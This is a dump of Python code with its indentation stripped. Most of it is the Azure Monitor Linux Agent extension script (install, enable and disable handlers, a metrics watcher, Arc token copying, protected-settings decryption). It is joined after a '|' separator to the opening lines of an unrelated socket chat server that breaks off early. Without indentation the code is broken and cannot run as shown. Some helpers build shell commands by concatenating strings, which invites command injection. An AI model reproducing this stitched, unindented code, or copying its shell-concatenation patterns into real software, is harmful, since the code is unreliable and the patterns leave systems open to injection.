default_configs["MONITORING_GCS_CERT_CERTFILE"] = "/etc/mdsd.d/gcscert.pem"
fh = open("/etc/mdsd.d/gcscert.pem", "wb")
fh.write(MONITORING_GCS_CERT_CERTFILE)
fh.close()
os.chown("/etc/mdsd.d/gcscert.pem", uid, gid)
os.system('chmod {1} {0}'.format("/etc/mdsd.d/gcscert.pem", 400))
if MONITORING_GCS_CERT_KEYFILE is not None:
default_configs["MONITORING_GCS_CERT_KEYFILE"] = "/etc/mdsd.d/gcskey.pem"
fh = open("/etc/mdsd.d/gcskey.pem", "wb")
fh.write(MONITORING_GCS_CERT_KEYFILE)
fh.close()
os.chown("/etc/mdsd.d/gcskey.pem", uid, gid)
os.system('chmod {1} {0}'.format("/etc/mdsd.d/gcskey.pem", 400))
config_file = "/etc/default/mdsd"
config_updated = False
try:
if os.path.isfile(config_file):
data = []
new_data = ""
vars_set = set()
with open(config_file, "r") as f:
data = f.readlines()
for line in data:
for var in list(default_configs.keys()):
if var in line:
line = "export " + var + "=" + default_configs[var] + "\n"
vars_set.add(var)
break
new_data += line
for var in list(default_configs.keys()):
if var not in vars_set:
new_data += "export " + var + "=" + default_configs[var] + "\n"
with open("/etc/default/mdsd_temp", "w") as f:
f.write(new_data)
config_updated = True if len(new_data) > 0 else False
if not config_updated or not os.path.isfile("/etc/default/mdsd_temp"):
log_and_exit("install",MissingorInvalidParameterErrorCode, "Error while updating MCS Environment Variables in /etc/default/mdsd")
os.remove(config_file)
os.rename("/etc/default/mdsd_temp", config_file)
uid = pwd.getpwnam("syslog").pw_uid
gid = grp.getgrnam("syslog").gr_gid
os.chown(config_file, uid, gid)
os.system('chmod {1} {0}'.format(config_file, 400))
else:
log_and_exit("install", MissingorInvalidParameterErrorCode, "Could not find the file - /etc/default/mdsd" )
except:
log_and_exit("install", MissingorInvalidParameterErrorCode, "Failed to add MCS Environment Variables in /etc/default/mdsd" )
return exit_code, output
def check_kill_process(pstring):
for line in os.popen("ps ax | grep " + pstring + " | grep -v grep"):
fields = line.split()
pid = fields[0]
os.kill(int(pid), signal.SIGKILL)
def uninstall():
"""
Uninstall the Azure Monitor Linux Agent.
This is a somewhat soft uninstall. It is not a purge.
Note: uninstall operation times out from WAAgent at 5 minutes
"""
find_package_manager("Uninstall")
if PackageManager == "dpkg":
OneAgentUninstallCommand = "dpkg -P azure-mdsd"
elif PackageManager == "rpm":
OneAgentUninstallCommand = "rpm -e azure-mdsd"
else:
log_and_exit("Uninstall", UnsupportedOperatingSystem, "The OS has neither rpm nor dpkg" )
hutil_log_info('Running command "{0}"'.format(OneAgentUninstallCommand))
# Retry, since uninstall can fail due to concurrent package operations
try:
exit_code, output = run_command_with_retries_output(OneAgentUninstallCommand, retries = 4,
retry_check = retry_if_dpkg_locked,
final_check = final_check_if_dpkg_locked)
except Exception as ex:
exit_code = 1
output = 'Uninstall failed with error: {0}\n' \
'Stacktrace: {1}'.format(ex, traceback.format_exc())
return exit_code, output
def enable():
"""
Start the Azure Monitor Linux Agent Service
This call will return non-zero or throw an exception if
the settings provided are incomplete or incorrect.
Note: enable operation times out from WAAgent at 5 minutes
"""
exit_if_vm_not_supported('Enable')
# Check if this is Arc VM and enable arc daemon if it is
if metrics_utils.is_arc_installed():
hutil_log_info("This VM is an Arc VM, Running the arc watcher daemon.")
start_arc_process()
if is_systemd():
OneAgentEnableCommand = "systemctl start mdsd"
else:
hutil_log_info("The VM doesn't have systemctl. Using the init.d service to start mdsd.")
OneAgentEnableCommand = "/etc/init.d/mdsd start"
public_settings, protected_settings = get_settings()
if public_settings is not None and public_settings.get("GCS_AUTO_CONFIG") == "true":
OneAgentEnableCommand = "systemctl start mdsdmgr"
if not is_systemd():
hutil_log_info("The VM doesn't have systemctl. Using the init.d service to start mdsdmgr.")
OneAgentEnableCommand = "/etc/init.d/mdsdmgr start"
hutil_log_info('Handler initiating onboarding.')
exit_code, output = run_command_and_log(OneAgentEnableCommand)
if exit_code == 0:
#start metrics process if enable is successful
start_metrics_process()
return exit_code, output
def disable():
"""
Disable Azure Monitor Linux Agent process on the VM.
Note: disable operation times out from WAAgent at 15 minutes
"""
# disable arc daemon if it is running
stop_arc_watcher()
#stop the metrics process
stop_metrics_process()
#stop the Azure Monitor Linux Agent service
if is_systemd():
DisableOneAgentServiceCommand = "systemctl stop mdsd"
else:
DisableOneAgentServiceCommand = "/etc/init.d/mdsd stop"
hutil_log_info("The VM doesn't have systemctl. Using the init.d service to stop mdsd.")
exit_code, output = run_command_and_log(DisableOneAgentServiceCommand)
return exit_code, output
def update():
"""
Update the current installation of AzureMonitorLinuxAgent
No install logic is needed here, as install() will be called
on update because upgradeMode = "UpgradeWithInstall" is set in the HandlerManifest
"""
return 0, ""
def stop_metrics_process():
if telhandler.is_running(is_lad=False):
#Stop the telegraf and ME services
tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False)
if tel_out:
hutil_log_info(tel_msg)
else:
hutil_log_error(tel_msg)
#Delete the telegraf and ME services
tel_rm_out, tel_rm_msg = telhandler.remove_telegraf_service()
if tel_rm_out:
hutil_log_info(tel_rm_msg)
else:
hutil_log_error(tel_rm_msg)
if me_handler.is_running(is_lad=False):
me_out, me_msg = me_handler.stop_metrics_service(is_lad=False)
if me_out:
hutil_log_info(me_msg)
else:
hutil_log_error(me_msg)
me_rm_out, me_rm_msg = me_handler.remove_metrics_service(is_lad=False)
if me_rm_out:
hutil_log_info(me_rm_msg)
else:
hutil_log_error(me_rm_msg)
pids_filepath = os.path.join(os.getcwd(),'amametrics.pid')
# kill existing metrics watcher
if os.path.exists(pids_filepath):
with open(pids_filepath, "r") as f:
for pids in f.readlines():
kill_cmd = "kill " + pids
run_command_and_log(kill_cmd)
run_command_and_log("rm "+pids_filepath)
def start_metrics_process():
"""
Start metrics process that performs periodic monitoring activities
:return: None
"""
stop_metrics_process()
#start metrics watcher
oneagent_filepath = os.path.join(os.getcwd(),'agent.py')
args = ['python{0}'.format(sys.version_info[0]), oneagent_filepath, '-metrics']
log = open(os.path.join(os.getcwd(), 'daemon.log'), 'w')
hutil_log_info('start watcher process '+str(args))
subprocess.Popen(args, stdout=log, stderr=log)
def metrics_watcher(hutil_error, hutil_log):
"""
Watcher thread to monitor metric configuration changes and to take action on them
"""
# check every 30 seconds
sleepTime = 30
# sleep before starting the monitoring.
time.sleep(sleepTime)
last_crc = None
me_msi_token_expiry_epoch = None
while True:
try:
if os.path.isfile(MdsdCounterJsonPath):
f = open(MdsdCounterJsonPath, "r")
data = f.read()
if (data != ''):
json_data = json.loads(data)
if len(json_data) == 0:
last_crc = hashlib.sha256(data.encode('utf-8')).hexdigest()
if telhandler.is_running(is_lad=False):
#Stop the telegraf and ME services
tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False)
if tel_out:
hutil_log(tel_msg)
else:
hutil_error(tel_msg)
#Delete the telegraf and ME services
tel_rm_out, tel_rm_msg = telhandler.remove_telegraf_service()
if tel_rm_out:
hutil_log(tel_rm_msg)
else:
hutil_error(tel_rm_msg)
if me_handler.is_running(is_lad=False):
me_out, me_msg = me_handler.stop_metrics_service(is_lad=False)
if me_out:
hutil_log(me_msg)
else:
hutil_error(me_msg)
me_rm_out, me_rm_msg = me_handler.remove_metrics_service(is_lad=False)
if me_rm_out:
hutil_log(me_rm_msg)
else:
hutil_error(me_rm_msg)
else:
crc = hashlib.sha256(data.encode('utf-8')).hexdigest()
if(crc != last_crc):
# Resetting the me_msi_token_expiry_epoch variable if we set up ME again.
me_msi_token_expiry_epoch = None
hutil_log("Start processing metric configuration")
hutil_log(data)
telegraf_config, telegraf_namespaces = telhandler.handle_config(
json_data,
"udp://127.0.0.1:" + metrics_constants.ama_metrics_extension_udp_port,
"unix:///var/run/mdsd/default_influx.socket",
is_lad=False)
me_handler.setup_me(is_lad=False)
start_telegraf_out, log_messages = telhandler.start_telegraf(is_lad=False)
if start_telegraf_out:
hutil_log("Successfully started metrics-sourcer.")
else:
hutil_error(log_messages)
start_metrics_out, log_messages = me_handler.start_metrics(is_lad=False)
if start_metrics_out:
hutil_log("Successfully started metrics-extension.")
else:
hutil_error(log_messages)
last_crc = crc
generate_token = False
me_token_path = os.path.join(os.getcwd(), "/config/metrics_configs/AuthToken-MSI.json")
if me_msi_token_expiry_epoch is None or me_msi_token_expiry_epoch == "":
if os.path.isfile(me_token_path):
with open(me_token_path, "r") as f:
authtoken_content = f.read()
if authtoken_content and "expires_on" in authtoken_content:
me_msi_token_expiry_epoch = json.loads(authtoken_content)["expires_on"]  # the token file is JSON, so parse it before indexing
else:
generate_token = True
else:
generate_token = True
if me_msi_token_expiry_epoch:
currentTime = datetime.datetime.now()
token_expiry_time = datetime.datetime.fromtimestamp(int(me_msi_token_expiry_epoch))
if token_expiry_time - currentTime < datetime.timedelta(minutes=30):
# The MSI Token will expire within 30 minutes. We need to refresh the token
generate_token = True
if generate_token:
generate_token = False
msi_token_generated, me_msi_token_expiry_epoch, log_messages = me_handler.generate_MSI_token()
if msi_token_generated:
hutil_log("Successfully refreshed metrics-extension MSI Auth token.")
else:
hutil_error(log_messages)
telegraf_restart_retries = 0
me_restart_retries = 0
max_restart_retries = 10
# Check if telegraf is running, if not, then restart
if not telhandler.is_running(is_lad=False):
if telegraf_restart_retries < max_restart_retries:
telegraf_restart_retries += 1
hutil_log("Telegraf binary process is not running. Restarting telegraf now. Retry count - {0}".format(telegraf_restart_retries))
tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False)
if tel_out:
hutil_log(tel_msg)
else:
hutil_error(tel_msg)
start_telegraf_out, log_messages = telhandler.start_telegraf(is_lad=False)
if start_telegraf_out:
hutil_log("Successfully started metrics-sourcer.")
else:
hutil_error(log_messages)
else:
hutil_error("Telegraf binary process is not running. Failed to restart after {0} retries. Please check telegraf.log".format(max_restart_retries))
else:
telegraf_restart_retries = 0
# Check if ME is running, if not, then restart
if not me_handler.is_running(is_lad=False):
if me_restart_retries < max_restart_retries:
me_restart_retries += 1
hutil_log("MetricsExtension binary process is not running. Restarting MetricsExtension now. Retry count - {0}".format(me_restart_retries))
me_out, me_msg = me_handler.stop_metrics_service(is_lad=False)
if me_out:
hutil_log(me_msg)
else:
hutil_error(me_msg)
start_metrics_out, log_messages = me_handler.start_metrics(is_lad=False)
if start_metrics_out:
hutil_log("Successfully started metrics-extension.")
else:
hutil_error(log_messages)
else:
hutil_error("MetricsExtension binary process is not running. Failed to restart after {0} retries. Please check /var/log/syslog for ME logs".format(max_restart_retries))
else:
me_restart_retries = 0
except IOError as e:
hutil_error('I/O error in monitoring metrics. Exception={0}'.format(e))
except Exception as e:
hutil_error('Error in monitoring metrics. Exception={0}'.format(e))
finally:
time.sleep(sleepTime)
def metrics():
"""
Take care of setting up telegraf and ME for metrics if configuration is present
"""
pids_filepath = os.path.join(os.getcwd(), 'amametrics.pid')
py_pid = os.getpid()
with open(pids_filepath, 'w') as f:
f.write(str(py_pid) + '\n')
watcher_thread = Thread(target = metrics_watcher, args = [hutil_log_error, hutil_log_info])
watcher_thread.start()
watcher_thread.join()
return 0, ""
def start_arc_process():
"""
Start arc process that performs periodic monitoring activities
:return: None
"""
hutil_log_info("stopping previously running arc process")
stop_arc_watcher()
hutil_log_info("starting arc process")
#start arc watcher
oneagent_filepath = os.path.join(os.getcwd(),'agent.py')
args = ['python{0}'.format(sys.version_info[0]), oneagent_filepath, '-arc']
log = open(os.path.join(os.getcwd(), 'daemon.log'), 'w')
hutil_log_info('start watcher process '+str(args))
subprocess.Popen(args, stdout=log, stderr=log)
def start_arc_watcher():
"""
Take care of starting arc_watcher daemon if the VM has arc running
"""
hutil_log_info("Starting the watcher")
print("Starting the watcher")
pids_filepath = os.path.join(os.getcwd(), 'amaarc.pid')
py_pid = os.getpid()
print("pid ", py_pid)
with open(pids_filepath, 'w') as f:
f.write(str(py_pid) + '\n')
hutil_log_info("Written all the pids")
print("Written all the pids")
watcher_thread = Thread(target = arc_watcher, args = [hutil_log_error, hutil_log_info])
watcher_thread.start()
watcher_thread.join()
return 0, ""
# Dictionary of operations strings to methods
operations = {'Disable' : disable,
'Uninstall' : uninstall,
'Install' : install,
'Enable' : enable,
'Update' : update,
'Metrics' : metrics,
'Arc' : start_arc_watcher,
}
def stop_arc_watcher():
"""
Take care of stopping arc_watcher daemon if the VM has arc running
"""
pids_filepath = os.path.join(os.getcwd(),'amaarc.pid')
# kill existing arc watcher
if os.path.exists(pids_filepath):
with open(pids_filepath, "r") as f:
for pids in f.readlines():
proc = subprocess.Popen(["ps -o cmd= {0}".format(pids)], stdout=subprocess.PIPE, shell=True)
output = proc.communicate()[0].decode('utf-8', 'ignore')
if output and "arc" in output:
kill_cmd = "kill " + pids
run_command_and_log(kill_cmd)
# Delete the file after to avoid clutter
os.remove(pids_filepath)
def arc_watcher(hutil_error, hutil_log):
"""
This is needed to work around mdsd's syslog permission restriction, which prevents mdsd
from reading the temporary key files required to make HTTPS calls for an Arc MSI token during onboarding to download the AMCS config.
This method spins up a process that continuously refreshes that file path with valid keys,
so that whenever mdsd needs to refresh its MSI token, it finds the correct keys there to make the HTTPS calls.
"""
# check every 25 seconds
sleepTime = 25
# sleep before starting the monitoring.
time.sleep(sleepTime)
while True:
try:
arc_token_mdsd_dir = "/etc/mdsd.d/arc_tokens/"
if not os.path.exists(arc_token_mdsd_dir):
os.makedirs(arc_token_mdsd_dir)
else:
# delete the existing keys as they might not be valid anymore
for filename in os.listdir(arc_token_mdsd_dir):
filepath = arc_token_mdsd_dir + filename
os.remove(filepath)
arc_endpoint = metrics_utils.get_arc_endpoint()
try:
msiauthurl = arc_endpoint + "/metadata/identity/oauth2/token?api-version=2019-11-01&resource=https://monitor.azure.com/"
req = urllib.request.Request(msiauthurl, headers={'Metadata':'true'})
res = urllib.request.urlopen(req)
except:
# The above request is expected to fail and add a key to the path -
authkey_dir = "/var/opt/azcmagent/tokens/"
if not os.path.exists(authkey_dir):
raise Exception("Unable to find the auth key file at {0} returned from the arc msi auth request.".format(authkey_dir))
# Copy the tokens to mdsd accessible dir
for filename in os.listdir(authkey_dir):
filepath = authkey_dir + filename
print(filepath)
shutil.copy(filepath, arc_token_mdsd_dir)
# Change the ownership of the mdsd arc token dir to be accessible by syslog (since mdsd runs as syslog user)
os.system("chown -R syslog:syslog {0}".format(arc_token_mdsd_dir))
except Exception as e:
hutil_error('Error in arc watcher process while copying token for arc MSI auth queries. Exception={0}'.format(e))
finally:
time.sleep(sleepTime)
def parse_context(operation):
"""
Initialize a HandlerUtil object for this operation.
If the required modules have not been imported, this will return None.
"""
hutil = None
if ('Utils.WAAgentUtil' in sys.modules
and 'Utils.HandlerUtil' in sys.modules):
try:
logFileName = 'extension.log'
hutil = HUtil.HandlerUtility(waagent.Log, waagent.Error, logFileName=logFileName)
hutil.do_parse_context(operation)
# parse_context may throw KeyError if necessary JSON key is not
# present in settings
except KeyError as e:
waagent_log_error('Unable to parse context with error: ' \
'{0}'.format(e))
raise ParameterMissingException
return hutil
def find_package_manager(operation):
"""
Checks whether the distro is Debian-based (dpkg) or RPM-based (rpm) and assigns the package manager accordingly
"""
global PackageManager
global PackageManagerOptions
global BundleFileName
dist, ver = find_vm_distro(operation)
dpkg_set = set(["debian", "ubuntu"])
rpm_set = set(["oracle", "redhat", "centos", "red hat", "suse", "sles"])
for dpkg_dist in dpkg_set:
if dist.lower().startswith(dpkg_dist):
PackageManager = "dpkg"
# OK to replace /etc/default/mdsd, since the placeholders get replaced again.
# Otherwise, the package manager prompts for action (Y/I/N/O/D/Z) [default=N]
PackageManagerOptions = "--force-overwrite --force-confnew"
BundleFileName = BundleFileNameDeb
break
for rpm_dist in rpm_set:
if dist.lower().startswith(rpm_dist):
PackageManager = "rpm"
# Same as above.
PackageManagerOptions = "--force"
BundleFileName = BundleFileNameRpm
break
if PackageManager == "":
log_and_exit(operation, UnsupportedOperatingSystem, "The OS has neither rpm nor dpkg" )
def find_vm_distro(operation):
"""
Finds the Linux Distribution this vm is running on.
"""
vm_dist = vm_id = vm_ver = None
parse_manually = False
try:
vm_dist, vm_ver, vm_id = platform.linux_distribution()
except AttributeError:
try:
vm_dist, vm_ver, vm_id = platform.dist()
except AttributeError:
hutil_log_info("Falling back to /etc/os-release distribution parsing")
# Some python versions *IF BUILT LOCALLY* (e.g. 3.5) return string responses (e.g. 'bullseye/sid') from the platform.dist() function
# This causes an exception in the version parsing below, so add a check to switch to manual parsing in that case
try:
temp_vm_ver = int(vm_ver.split('.')[0])
except:
parse_manually = True
if (not vm_dist and not vm_ver) or parse_manually: # SLES 15 and others
try:
with open('/etc/os-release', 'r') as fp:
for line in fp:
if line.startswith('ID='):
vm_dist = line.split('=')[1]
vm_dist = vm_dist.split('-')[0]
vm_dist = vm_dist.replace('\"', '').replace('\n', '')
elif line.startswith('VERSION_ID='):
vm_ver = line.split('=')[1]
vm_ver = vm_ver.replace('\"', '').replace('\n', '')
except:
log_and_exit(operation, IndeterminateOperatingSystem, 'Indeterminate operating system')
return vm_dist, vm_ver
def is_vm_supported_for_extension(operation):
"""
Checks if the VM this extension is running on is supported by AzureMonitorAgent
Returns for platform.linux_distribution() vary widely in format, such as
'7.3.1611' returned for a VM with CentOS 7, so the first provided
digits must match
The supported distros of the AzureMonitorLinuxAgent are allowed to utilize
this VM extension. All other distros will get error code 51
"""
supported_dists = {'redhat' : ['6', '7', '8'], # Rhel
'centos' : ['6', '7', '8'], # CentOS
'red hat' : ['6', '7', '8'], # Oracle, RHEL
'oracle' : ['6', '7', '8'], # Oracle
'debian' : ['8', '9', '10'], # Debian
'ubuntu' : ['14.04', '16.04', '18.04', '20.04'], # Ubuntu
'suse' : ['12'], 'sles' : ['15'] # SLES
}
vm_supported = False
vm_dist, vm_ver = find_vm_distro(operation)
# Find this VM distribution in the supported list
for supported_dist in list(supported_dists.keys()):
if not vm_dist.lower().startswith(supported_dist):
continue
# Check if this VM distribution version is supported
vm_ver_split = vm_ver.split('.')
for supported_ver in supported_dists[supported_dist]:
supported_ver_split = supported_ver.split('.')
# If vm_ver is at least as precise (at least as many digits) as
# supported_ver and matches all the supported_ver digits, then
# this VM is guaranteed to be supported
vm_ver_match = True
for idx, supported_ver_num in enumerate(supported_ver_split):
try:
supported_ver_num = int(supported_ver_num)
vm_ver_num = int(vm_ver_split[idx])
except IndexError:
vm_ver_match = False
break
if vm_ver_num != supported_ver_num:
vm_ver_match = False
break
if vm_ver_match:
vm_supported = True
break
if vm_supported:
break
return vm_supported, vm_dist, vm_ver
def exit_if_vm_not_supported(operation):
"""
Check if this VM distro and version are supported by the AzureMonitorLinuxAgent.
If VM is supported, find the package manager present in this distro
If this VM is not supported, log the proper error code and exit.
"""
vm_supported, vm_dist, vm_ver = is_vm_supported_for_extension(operation)
if not vm_supported:
log_and_exit(operation, UnsupportedOperatingSystem, 'Unsupported operating system: ' \
'{0} {1}'.format(vm_dist, vm_ver))
return 0
def run_command_and_log(cmd, check_error = True, log_cmd = True):
"""
Run the provided shell command and log its output, including stdout and
stderr.
The output should not contain any PII, but the command might. In this case,
log_cmd should be set to False.
"""
exit_code, output = run_get_output(cmd, check_error, log_cmd)
if log_cmd:
hutil_log_info('Output of command "{0}": \n{1}'.format(cmd.rstrip(), output))
else:
hutil_log_info('Output: \n{0}'.format(output))
# also write output to STDERR since WA agent uploads that to Azlinux Kusto DB
# take only the last 500 characters, as the extension output is cut off after that
try:
if exit_code != 0:
sys.stderr.write(output[-500:])
if "Permission denied" in output:
# Enable failures
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
except:
hutil_log_info('Failed to write output to STDERR')
return exit_code, output
def run_command_with_retries_output(cmd, retries, retry_check, final_check = None,
check_error = True, log_cmd = True,
initial_sleep_time = InitialRetrySleepSeconds,
sleep_increase_factor = 1):
"""
Caller provides a method, retry_check, to use to determine if a retry
should be performed. This must be a function with two parameters:
exit_code and output
The final_check can be provided as a method to perform a final check after
retries have been exhausted
Logic used: will retry up to retries times with initial_sleep_time in
between tries
If the retry_check returns True for retry_verbosely, we will try cmd with
the standard -v verbose flag added
"""
try_count = 0
sleep_time = initial_sleep_time
run_cmd = cmd
run_verbosely = False
while try_count <= retries:
if run_verbosely:
run_cmd = cmd + ' -v'
exit_code, output = run_command_and_log(run_cmd, check_error, log_cmd)
should_retry, retry_message, run_verbosely = retry_check(exit_code,
output)
if not should_retry:
break
try_count += 1
hutil_log_info(retry_message)
time.sleep(sleep_time)
sleep_time *= sleep_increase_factor
if final_check is not None:
exit_code = final_check(exit_code, output)
return exit_code, output
def is_dpkg_locked(exit_code, output):
"""
If dpkg is locked, the output will contain a message similar to 'dpkg
status database is locked by another process'
"""
if exit_code != 0:
dpkg_locked_search = r'^.*dpkg.+lock.*$'
dpkg_locked_re = re.compile(dpkg_locked_search, re.M)
if dpkg_locked_re.search(output):
return True
return False
def retry_if_dpkg_locked(exit_code, output):
"""
Some commands fail because the package manager is locked (apt-get/dpkg
only); this will allow retries on failing commands.
"""
retry_verbosely = False
dpkg_locked = is_dpkg_locked(exit_code, output)
apt_get_exit_code, apt_get_output = run_get_output('which apt-get',
chk_err = False,
log_cmd = False)
if dpkg_locked:
return True, 'Retrying command because package manager is locked.', \
retry_verbosely
else:
return False, '', False
def final_check_if_dpkg_locked(exit_code, output):
"""
If dpkg is still locked after the retries, we want to return a specific
error code
"""
dpkg_locked = is_dpkg_locked(exit_code, output)
if dpkg_locked:
exit_code = DPKGLockedErrorCode
return exit_code
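# --- Illustrative sketch (not part of the extension) ---
# run_command_with_retries_output() accepts any retry_check implementing the
# (exit_code, output) -> (should_retry, retry_message, retry_verbosely)
# contract described in its docstring. A hypothetical check that retries on
# transient network failures and asks for a verbose re-run might look like this:
def retry_if_transient_network_error(exit_code, output):
    transient_markers = ('Temporary failure in name resolution',
                         'Connection timed out')
    if exit_code != 0 and any(marker in output for marker in transient_markers):
        return True, 'Retrying command after a transient network error.', True
    return False, '', False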
def get_settings():
"""
Retrieve the configuration for this extension operation
"""
global SettingsDict
public_settings = None
protected_settings = None
if HUtilObject is not None:
public_settings = HUtilObject.get_public_settings()
protected_settings = HUtilObject.get_protected_settings()
elif SettingsDict is not None:
public_settings = SettingsDict['public_settings']
protected_settings = SettingsDict['protected_settings']
else:
SettingsDict = {}
handler_env = get_handler_env()
try:
config_dir = str(handler_env['handlerEnvironment']['configFolder'])
except:
config_dir = os.path.join(os.getcwd(), 'config')
seq_no = get_latest_seq_no()
settings_path = os.path.join(config_dir, '{0}.settings'.format(seq_no))
try:
with open(settings_path, 'r') as settings_file:
settings_txt = settings_file.read()
settings = json.loads(settings_txt)
h_settings = settings['runtimeSettings'][0]['handlerSettings']
public_settings = h_settings['publicSettings']
SettingsDict['public_settings'] = public_settings
except:
hutil_log_error('Unable to load handler settings from ' \
'{0}'.format(settings_path))
if ('protectedSettings' in h_settings
and 'protectedSettingsCertThumbprint' in h_settings
and h_settings['protectedSettings'] is not None
and h_settings['protectedSettingsCertThumbprint'] is not None):
encoded_settings = h_settings['protectedSettings']
settings_thumbprint = h_settings['protectedSettingsCertThumbprint']
encoded_cert_path = os.path.join('/var/lib/waagent',
'{0}.crt'.format(
settings_thumbprint))
encoded_key_path = os.path.join('/var/lib/waagent',
'{0}.prv'.format(
settings_thumbprint))
decoded_settings = base64.standard_b64decode(encoded_settings)
decrypt_cmd = 'openssl smime -inform DER -decrypt -recip {0} ' \
'-inkey {1}'.format(encoded_cert_path,
encoded_key_path)
try:
session = subprocess.Popen([decrypt_cmd], shell = True,
stdin = subprocess.PIPE,
stderr = subprocess.STDOUT,
stdout = subprocess.PIPE)
output = session.communicate(decoded_settings)
except OSError:
pass
protected_settings_str = output[0]
if protected_settings_str is None:
log_and_exit('Enable', 1, 'Failed decrypting ' \
'protectedSettings')
protected_settings = ''
try:
protected_settings = json.loads(protected_settings_str)
except:
hutil_log_error('JSON exception decoding protected settings')
SettingsDict['protected_settings'] = protected_settings
return public_settings, protected_settings
def update_status_file(operation, exit_code, exit_status, message):
"""
Mimic HandlerUtil method do_status_report in case hutil method is not
available
Write status to status file
"""
handler_env = get_handler_env()
try:
extension_version = str(handler_env['version'])
status_dir = str(handler_env['handlerEnvironment']['statusFolder'])
except:
extension_version = "1.0"
status_dir = os.path.join(os.getcwd(), 'status')
status_txt = [{
"version" : extension_version,
"timestampUTC" : time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
"status" : {
"name" : "Microsoft.Azure.Monitor.AzureMonitorLinuxAgent",
"operation" : operation,
"status" : exit_status,
"code" : exit_code,
"formattedMessage" : {
"lang" : "en-US",
"message" : message
}
}
}]
status_json = json.dumps(status_txt)
# Find the most recently changed config file and then use the
# corresponding status file
latest_seq_no = get_latest_seq_no()
status_path = os.path.join(status_dir, '{0}.status'.format(latest_seq_no))
status_tmp = '{0}.tmp'.format(status_path)
with open(status_tmp, 'w+') as tmp_file:
tmp_file.write(status_json)
os.rename(status_tmp, status_path)
def get_handler_env():
"""
Set and retrieve the contents of HandlerEnvironment.json as JSON
"""
global HandlerEnvironment
if HandlerEnvironment is None:
handler_env_path = os.path.join(os.getcwd(), 'HandlerEnvironment.json')
try:
with open(handler_env_path, 'r') as handler_env_file:
handler_env_txt = handler_env_file.read()
handler_env = json.loads(handler_env_txt)
if type(handler_env) == list:
handler_env = handler_env[0]
HandlerEnvironment = handler_env
except Exception as e:
waagent_log_error(str(e))
return HandlerEnvironment
def get_latest_seq_no():
"""
Determine the latest operation settings number to use
"""
global SettingsSequenceNumber
if SettingsSequenceNumber is None:
handler_env = get_handler_env()
try:
config_dir = str(handler_env['handlerEnvironment']['configFolder'])
except:
config_dir = os.path.join(os.getcwd(), 'config')
latest_seq_no = -1
cur_seq_no = -1
latest_time = None
try:
for dir_name, sub_dirs, file_names in os.walk(config_dir):
for file_name in file_names:
file_basename = os.path.basename(file_name)
match = re.match(r'[0-9]{1,10}\.settings', file_basename)
if match is None:
continue
cur_seq_no = int(file_basename.split('.')[0])
file_path = os.path.join(config_dir, file_name)
cur_time = os.path.getmtime(file_path)
if latest_time is None or cur_time > latest_time:
latest_time = cur_time
latest_seq_no = cur_seq_no
except:
pass
if latest_seq_no < 0:
latest_seq_no = 0
SettingsSequenceNumber = latest_seq_no
return SettingsSequenceNumber
def run_get_output(cmd, chk_err = False, log_cmd = True):
"""
Mimic waagent method RunGetOutput in case waagent is not available
Run shell command and return exit code and output
"""
if 'Utils.WAAgentUtil' in sys.modules:
# WALinuxAgent-2.0.14 allows only 2 parameters for RunGetOutput
# If checking the number of parameters fails, pass 2
try:
sig = inspect.signature(waagent.RunGetOutput)
params = sig.parameters
waagent_params = len(params)
except:
try:
spec = inspect.getargspec(waagent.RunGetOutput)
params = spec.args
waagent_params = len(params)
except:
waagent_params = 2
if waagent_params >= 3:
exit_code, output = waagent.RunGetOutput(cmd, chk_err, log_cmd)
else:
exit_code, output = waagent.RunGetOutput(cmd, chk_err)
else:
try:
output = subprocess.check_output(cmd, stderr = subprocess.STDOUT,
shell = True)
exit_code = 0
except subprocess.CalledProcessError as e:
exit_code = e.returncode
output = e.output
output = output.encode('utf-8')
# On python 3, encode returns a byte object, so we must decode back to a string
if sys.version_info >= (3,):
output = output.decode('utf-8', 'ignore')
return exit_code, output.strip()
def init_waagent_logger():
"""
Initialize waagent logger
If waagent has not been imported, catch the exception
"""
try:
waagent.LoggerInit('/var/log/waagent.log', '/dev/stdout', True)
except Exception as e:
print('Unable to initialize waagent log because of exception ' \
'{0}'.format(e))
def waagent_log_info(message):
"""
Log informational message, being cautious of possibility that waagent may
not be imported
"""
if 'Utils.WAAgentUtil' in sys.modules:
waagent.Log(message)
else:
print('Info: {0}'.format(message))
def waagent_log_error(message):
"""
Log error message, being cautious of possibility that waagent may not be
imported
"""
if 'Utils.WAAgentUtil' in sys.modules:
waagent.Error(message)
else:
print('Error: {0}'.format(message))
def hutil_log_info(message):
"""
Log informational message, being cautious of possibility that hutil may
not be imported and configured
"""
if HUtilObject is not None:
HUtilObject.log(message)
else:
print('Info: {0}'.format(message))
def hutil_log_error(message):
"""
Log error message, being cautious of possibility that hutil may not be
imported and configured
"""
if HUtilObject is not None:
HUtilObject.error(message)
else:
print('Error: {0}'.format(message))
def log_and_exit(operation, exit_code = 1, message = ''):
"""
Log the exit message and perform the exit
"""
if exit_code == 0:
waagent_log_info(message)
hutil_log_info(message)
exit_status = 'success'
else:
waagent_log_error(message)
hutil_log_error(message)
exit_status = 'failed'
if HUtilObject is not None:
HUtilObject.do_exit(exit_code, operation, exit_status, str(exit_code),
message)
else:
update_status_file(operation, str(exit_code), exit_status, message)
sys.exit(exit_code)
# Exceptions
# If these exceptions are expected to be caught by the main method, they
# include an error_code field with an integer with which to exit from main
class AzureMonitorAgentForLinuxException(Exception):
"""
Base exception class for all exceptions; as such, its error code is the
basic error code traditionally returned in Linux: 1
"""
error_code = 1
def get_error_message(self, operation):
"""
Return a descriptive error message based on this type of exception
"""
return '{0} failed with exit code {1}'.format(operation,
self.error_code)
class ParameterMissingException(AzureMonitorAgentForLinuxException):
"""
There is a missing parameter for the AzureMonitorLinuxAgent Extension
"""
error_code = MissingorInvalidParameterErrorCode
def get_error_message(self, operation):
return '{0} failed due to a missing parameter: {1}'.format(operation,
self)
if __name__ == '__main__' :
main()
|
server.py
|
import socket
from threading import Thread
# server's IP address
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5002 # port we want to use
separator_token = "<SEP>" # we will use this to separate the client name & message
# initialize list/set of all connected client's sockets
client_sockets = set()
# create a TCP socket
s = socket.socket()
# make the address/port reusable
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind the socket to the address we specified
